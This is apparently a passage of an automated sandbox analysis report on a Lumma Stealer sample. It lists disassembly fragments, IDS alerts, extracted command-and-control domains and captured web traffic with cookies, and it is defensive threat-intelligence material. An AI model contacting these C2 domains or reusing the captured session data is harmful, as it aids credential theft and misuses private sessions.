Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov word ptr [esi], ax	16_2_047E0B95
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx edx, byte ptr [ecx+eax]	16_2_059CF7B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	16_2_05A0A1E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	16_2_059F24B5
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	16_2_05A0A5E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	16_2_059F2531
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	16_2_059F24D0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov edi, dword ptr [ebp-3Ch]	16_2_059EE4C2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah	16_2_05A0A4D0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	16_2_059FF4EE
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, ebp	16_2_059CA4E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, ebp	16_2_059CA4E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	16_2_05A03420
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [edi], al	16_2_059F3419
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	16_2_059EF40F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [edi], al	16_2_059F342B
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-18h]	16_2_059EB6CC
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-18h]	16_2_059EB732
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-54h]	16_2_059E0730
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	16_2_059D4611
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	16_2_059D460A
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h	16_2_059DF193
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov word ptr [esi], ax	16_2_059DF193
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then jmp eax	16_2_059D61F2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	16_2_05A01100
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [edi], al	16_2_059F314A
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov edi, eax	16_2_059C7170
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then jmp ecx	16_2_059FF160
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	16_2_059D60F1
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-34h]	16_2_059E4390
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	16_2_059F03B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	16_2_059E83A5
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	16_2_059D33DB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	16_2_05A0A360
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	16_2_05A07350
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	16_2_059C5D10
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	16_2_059EED6D
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	16_2_059EED6D
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	16_2_059E8C90
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	16_2_059C4CB0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	16_2_059DDCC2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov word ptr [eax], cx	16_2_05A09C10
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh	16_2_059EBC50
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh	16_2_059EBC50
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	16_2_059D3FA9
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+28h]	16_2_059D3FA9
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	16_2_059D0F0F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	16_2_059DAF50
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov edi, ecx	16_2_059D3EA6
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	16_2_05A07E30
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 54CA534Eh	16_2_05A07E30
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then push ebx	16_2_059DDE33
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	16_2_059D399C
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	16_2_05A099B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	16_2_05A049F0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	16_2_059E6910
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	16_2_059F2899
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	16_2_059F2899
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	16_2_05A0A8B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	16_2_05A068B9
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	16_2_059FA880
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	16_2_059FF8FA
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h	16_2_059FF8FA
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	16_2_059F2813
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	16_2_059F2813
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh	16_2_05A03870
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov word ptr [eax], cx	16_2_059E6B80
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-54h]	16_2_059E0BAC
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000744h]	16_2_059F2BC9
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [edi], al	16_2_059F2BC9
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	16_2_059F2BC9
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	16_2_059EDB75
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+10h]	16_2_059CDAB0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, 0000000Bh	16_2_059F3AB3
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	16_2_059D5ADF
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-54h]	16_2_059E0A01
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx ebp, word ptr [edi]	16_2_059FEA30

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2056078 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (racedsuitreow .shop) : 192.168.2.16:53987 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056079 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI) : 192.168.2.16:49829 -> 172.67.206.221:443
Source: Network traffic	Suricata IDS: 2056079 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI) : 192.168.2.16:49830 -> 172.67.206.221:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.16:49830 -> 172.67.206.221:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.16:49830 -> 172.67.206.221:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.16:49829 -> 172.67.206.221:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.16:49829 -> 172.67.206.221:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: covvercilverow.shop
Source: Malware configuration extractor	URLs: priooozekw.shop
Source: Malware configuration extractor	URLs: pumpkinkwquo.shop
Source: Malware configuration extractor	URLs: surroundeocw.shop
Source: Malware configuration extractor	URLs: deallyharvenw.shop
Source: Malware configuration extractor	URLs: abortinoiwiam.shop
Source: Malware configuration extractor	URLs: racedsuitreow.shop
Source: Malware configuration extractor	URLs: candleduseiwo.shop
Source: Malware configuration extractor	URLs: defenddsouneuw.shop

Source: global traffic

TCP traffic: 192.168.2.16:59822 -> 1.1.1.1:53

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.68

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /xjs/_/ss/k=xjs.hd.3K9kqFG9IbE.L.B1.O/am=JCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAACAAAAAAAAAAUADsJAABGAAAbABAAAAAAAAIAgAEAAAAAACABAAAAAmABAAAAAAACABAJAACgCAAAAIBACBAAgAAKIAQoQAIEiiAUAgAAAAMAAIQAMMAwAEEFAKMAAQAAAAAAECACAACAIwABAgD0EAgAA4E0AQAQAnoAAgAAAEAAAAEgAAAMgAEyAAEAAAAAAABkAAAAAAAAAAAAAAAAAAAAAAAAAACAACAAoAAAAAAAAAAAAAAAAAAAAAAC/d=1/ed=1/br=1/rs=ACT90oEAN8vKHPrZc1uQQW97laV6I-0P2A/m=cdos,hsm,jsa,mb4ZUb,d,csi,cEt90b,SNUn3,qddgKe,sTsDMc,dtl0hd,eHDfl HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
Source: global traffic	HTTP traffic detected: GET /logos/2024/popcorn/rc4/cta.png HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
Source: global traffic	HTTP traffic detected: GET /xjs/_/js/k=xjs.hd.en.UzAaLIOvKPw.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/d=1/ed=1/dg=3/br=1/rs=ACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA/ee=ALeJib:B8gLwd;AfeaP:TkrAjf;BMxAGc:E5bFse;BgS6mb:fidj5d;BjwMce:cXX2Wb;CxXAWb:YyRLvc;DULqB:RKfG5c;Dkk6ge:JZmW9e;DpcR3d:zL72xf;EABSZ:MXZt9d;ESrPQc:mNTJvc;EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;EnlcNd:WeHg4;F9mqte:UoRcbe;Fmv9Nc:O1Tzwc;G0KhTb:LIaoZ;G6wU6e:hezEbd;GleZL:J1A7Od;HMDDWe:G8QUdb;HoYVKb:PkDN7e;HqeXPd:cmbnH;IBADCc:RYquRb;IoGlCf:b5lhvb;IsdWVc:qzxzOb;JXS8fb:Qj0suc;JbMT3:M25sS;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;KOxcK:OZqGte;KQzWid:ZMKkN;KcokUb:KiuZBf;KpRAue:Tia57b;LBgRLc:SdcwHb,XVMNvd;LEikZe:byfTOb,lsjVmc;LXA8b:q7OdKd;LsNahb:ucGLNb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Np8Qkd:Dpx6qc;Nyt6ic:jn2sGd;OgagBe:cNTe0;OohIYe:mpEAQb;Pjplud:EEDORb,PoEs9b;Q1Ow7b:x5CSu;Q6C5kf:pfdZCe;QGR0gd:Mlhmy;R2kc8b:ALJqWb;R4IIIb:QWfeKf;R9Ulx:CR7Ufe;RDNBlf:zPRCJb;SLtqO:Kh1xYe;SMDL4c:fTfGO,fTfGO;SNUn3:ZwDk9d,x8cHvb;ScI3Yc:e7Hzgb,e7Hzgb;ShpF6e:N0pvGc;SzQQ3e:dNhofb;TxfV6d:YORN0b;U96pRd:FsR04;UBKJZ:LGDJGb;UDrY1c:eps46d;UVmjEd:EesRsb;UyG7Kb:wQd0G;V2HTTe:RolTY;VGRfx:VFqbr;VN6jIc:ddQyuf;VOcgDe:YquhTb;VsAqSb:PGf2Re;VxQ32b:k0XsBb;WCEKNd:I46Hvd;WDGyFe:jcVOxd;Wfmdue:g3MJlb;XUezZ:sa7lqb;YIZmRd:A1yn5d;YV5bee:IvPZ6d;YkQtAf:rx8ur;ZMvdv:PHFPjb;ZSH6tc:QAvyLe;ZWEUA:afR4Cf;a56pNe:JEfCwb;aAJE9c:WHW6Ef;aCJ9tf:qKftvc;aZ61od:arTwJ;af0EJf:ghinId;bDXwRe:UsyOtc;bcPXSc:gSZLJb;cEt90b:ws9Tlc;cFTWae:gT8qnd;coJ8e:KvoW8;dIoSBb:ZgGg9b;dLlj2:Qqt3Gf;daB6be:lMxGPd;dowIGb:ebZ3mb,ebZ3mb;dtl0hd:lLQWFe;eBAeSb:Ck63tb;eBZ5Nd:audvde;eHDfl:ofjVkb;eO3lse:nFClrf;euOXY:OZjbQ;g8nkx:U4MzKc;gaub4:TN6bMe;gtVSi:ekUOYd;h3MYod:cEt90b;hK67qb:QWEO5b;heHB1:sFczq;hjRo6e:F62sG;hsLsYc:Vl118;iFQyKf:QIhFr,vfuNJf;imqimf:jKGL2e;jY0zg:Q6tNgc;k2Qxcb:XY51pe;kCQyJ:ueyPK;kMFpHd:OTA3Ae;kbAm9d:MkHyGd;lOO0Vd:OTA3Ae;lkq0A:JyBE3e;nAFL3:NTMZac,s39S4;nJw4Gd:dPFZH;oGtAuc:sOXFj;oSUNyd:fTfGO,fTfGO;oUlnpc:RagDlc;okUaUd:wItadb;pKJiXd:VCenhc;pNsl2d:j9Yuyc;pXdRYb:JKoKVe;pj82le:mg5CW;qZx2Fc:j0xrE;qaS3gd:yiLg6e;qafBPd:sgY6Zb;qavrXe:zQzcXe;qddgKe:d7YSfd,x4FYXe;rQSrae:C6D5Fc;sTsDMc:kHVSUb;sZmdvc:rdGEfc;tH4IIe:Ymry6;tosKvd:ZCqP3;trZL0b:qY8PFe;uuQkY:u2V3ud;vGrMZ:lPJJ0c;vfVwPd:lcrkwe;w3bZCb:ZPGaIb;w4rSdf:XKiZ9;w9w86d:dt4g2b;wQlYve:aLUfP;wR5FRb:O1Gjze,TtcOte;wV5Pjc:L8KGxe;whEZac:F4AmNb;xBbsrc:NEW1Qc;ysNiMc:CpIBjd;yxTchf:KUM7Z;z97YGf:oug9te;zOsCQe:Ko78Df;zaIgPb:Qtpxbd/m=cdos,hsm,jsa,mb4ZUb,d,csi,cEt90b,SNUn3,qddgKe,sTsDMc,dtl0hd,eHDfl HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua
Source: global traffic	HTTP traffic detected: GET /images/searchbox/desktop_searchbox_sprites318_hr.webp HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: 